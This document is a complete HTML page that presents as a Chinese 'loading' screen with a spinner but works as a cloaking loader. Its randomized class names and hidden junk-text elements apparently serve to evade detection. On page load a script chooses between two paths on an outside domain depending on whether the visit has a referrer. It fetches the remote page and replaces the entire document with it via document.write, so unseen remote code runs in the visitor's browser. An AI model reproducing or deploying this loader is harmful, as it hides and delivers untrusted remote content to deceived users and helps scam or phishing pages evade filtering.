<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .mduBdjNQPA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .mduBdjNQPA .VNW1QrN8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .mduBdjNQPA .content {
            line-height: 50px;
            text-align: center
        }

        .mduBdjNQPA .img {
            width: 100%
        }

        .mduBdjNQPA .wZjCCa1U {
            text-align: center
        }

        .mduBdjNQPA .wZjCCa1U span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .mduBdjNQPA .wZjCCa1U span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .mduBdjNQPA .wZjCCa1U span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .mduBdjNQPA .wZjCCa1U span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .mduBdjNQPA .wZjCCa1U span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .mduBdjNQPA .wZjCCa1U span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .mduBdjNQPA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Lu5QWbDlHK(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var bzMSn = Lu5QWbDlHK('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ bzMSn +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ bzMSn +".html?a=share";
		}
		
        VAScGMgoz=url+"#"+new Date().getTime();
        VAScGMgoz && function() {
            $.get(VAScGMgoz, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>U2i66s97cIpdGtTtUNgGaSFNFHxhhjd0aNvyml47nt4a70WHNSYszAwsjsQyxUfcaWo5HxCzPKVIwdjnTpOOUcGSil3</p>
<h1 style='display:none' >kuzZRsYQZWGEPSpKrGZYjBOcKdKSQZnOpCimLGo1flTlFuTBgx8pLOfXydAewX9xC8oVovQRMjj8JCXLTaoMAPE</h1>
<p  style='display:none'>U2i66s97cIpdGtTtUNgGaSFNFHxhhjd0aNvyml47nt4a70WHNSYszAwsjsQyxUfcaWo5HxCzPKVIwdjnTpOOUcGSil3</p><div class="mduBdjNQPA">
    <div class="VNW1QrN8">
        <div class="wZjCCa1U">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>Y1Cv6ZZBxpjgIDqqwO9LDMl6UiaLJXSHjcPLc4mAED2GnLuvcq8Kn</span>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<div style='display:none'>ReXdrecZoquxEiZIZubGSbamhQTkbwdYxtYLpa8snDYjDQL8K9S9518IfoJx1ycgRG2GeKgdSb17RvS</div>
<span style='display:none'>Y1Cv6ZZBxpjgIDqqwO9LDMl6UiaLJXSHjcPLc4mAED2GnLuvcq8Kn</span>
<ul style='display:none' >aeB5JnRoD2WmiRz2bJ3y0s96eq0jf</ul>
<p  style='display:none'>iE5RxHVKjXM</p>
<li style='display:none' >T86mgeuSfvQEhfsdyrHzoqWnZ513En9pDtBA2OTl97WEExTm2riBvGGqNU4gfzyKbVe</li></body>
</html>